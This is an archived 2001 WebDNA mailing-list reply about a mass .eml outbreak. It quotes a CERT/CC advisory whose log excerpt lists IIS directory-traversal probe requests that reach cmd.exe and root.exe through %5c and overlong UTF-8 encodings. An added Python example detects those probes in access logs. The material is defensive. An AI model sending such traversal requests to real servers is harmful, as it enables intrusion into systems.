Re: .eml files

This WebDNA talk-list message is from 2001. It keeps the original formatting.
numero = 38666
interpreted = N
texte = On 9/18/01 2:43 PM, Jeff - Sourcestudios.com wrote:

> Our server has been going crazy sending out these .eml files. They seem to be
> all over the place.
>
> Anyone else experiencing this or any knowledge of this?
>
> Running NT 4.0, webcat 4.02rc2

http://vil.mcafee.com/dispVirus.asp?virus_k=99209
http://news.cnet.com/news/0-1003-200-7215349.html?tag=lthd

From cert.org:

http://www.cert.org/current/current_activity.html

Increase in Port 80 (HTTP) scanning activity

This morning (September 18th) the CERT/CC started receiving reports of a massive increase in scanning directed at port 80 (HTTP). Reports indicate that this scanning activity is attempting to exploit systems previously compromised by Code Red II and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT Vulnerability Note VU#111677 for information on the type of vulnerability being exploited.

The following is a log excerpt of this scanning activity:

    GET /scripts/root.exe?/c+dir
    GET /MSADC/root.exe?/c+dir
    GET /c/winnt/system32/cmd.exe?/c+dir
    GET /d/winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
    GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
    GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

The CERT/CC has also received reports of a possibly new piece of malicious code named readme.exe being sent via email. Preliminary analysis indicates that this file may be related to the increase in port 80 scanning activity.

Sites are encouraged to verify the state of security patches on all IIS servers and email client software. Administrators may also want to add filters to mail servers to block the readme.exe attachment. In addition, sites may wish to notify users of the existence of readme.exe and its potential threat.

Robert Minor
Director of Internet Services
------------------------------------------------------------
Cybermill Communications
http://www.cybermill.com
http://www.merchantmaker.com

Providing Ecommerce and interactive website development and hosting services on Macintosh, Windows NT, Unix, and AS/400.

All your websites are belong to us!
-------------------------------------------------------------

Associated Messages, from the most recent to the oldest:

    
  1. Re: .eml files (John Peacock 2001)
  2. Re: .eml files (Brian B. Burton 2001)
  3. Re: .eml files (Robert Kudrle 2001)
  4. Re: .eml files (Robert Kudrle 2001)
  5. Re: .eml files (Glenn Busbin 2001)
  6. Re: .eml files (Jeff - Sourcestudios.com 2001)
  7. Re: .eml files (Charles Kline 2001)
  8. Re: .eml files (Bob Minor 2001)
  9. Re: .eml files ( 2001)
  10. Re: .eml files (Bob Minor 2001)
  11. .eml files (Jeff - Sourcestudios.com 2001)
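
The probe requests in the CERT/CC log excerpt quoted in the message above can be picked out of a web server access log. The following is an added example, not part of the original message or of the CERT/CC note: it normalises each request path and reports, per source address, which probe traits were seen. The log lines are constructed, the function names are hypothetical, and the `%255c` double-encoded line goes beyond the excerpt to cover the general repeated-decoding case.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (Common Log Format); addresses are documentation ranges.
SAMPLE_LOG = r'''
192.0.2.10 - - [18/Sep/2001:09:14:02 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:09:14:03 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:09:14:03 -0400] "GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:09:14:04 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
198.51.100.7 - - [18/Sep/2001:09:15:40 -0400] "GET /catalog/search.tpl?q=root.exe+download HTTP/1.0" 200 5120
198.51.100.7 - - [18/Sep/2001:09:15:41 -0400] "GET /images/logo.gif HTTP/1.0" 200 2048
'''

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|HEAD|POST) (\S+)')
HEX_ESCAPE = re.compile(rb'\\x([0-9a-fA-F]{2})')

def decode_path(raw: str) -> bytes:
    # Turn the log's literal \xNN escapes back into bytes, then percent-decode
    # up to three times so double-encoded separators (%255c -> %5c -> \) surface.
    data = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw.encode('latin-1'))
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def classify(url: str) -> list:
    # Only the path is inspected; a query string that merely mentions root.exe is ignored.
    path = decode_path(url.split('?', 1)[0]).lower()
    reasons = []
    if path.endswith((b'/cmd.exe', b'/root.exe')):
        reasons.append('shell-binary')
    if re.search(rb'\.\.[/\\]', path):
        reasons.append('traversal')
    if b'\xc0' in path or b'\xc1' in path:  # 0xC0/0xC1 never occur in valid UTF-8
        reasons.append('overlong-utf8')
    return reasons

def scan(log_text: str) -> dict:
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and (reasons := classify(m.group(2))):
            hits[m.group(1)].update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))
```

A source address that shows several traits within seconds, as 192.0.2.10 does in the constructed sample, matches the scanning pattern the advisory describes; a single hit on its own is weaker evidence.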
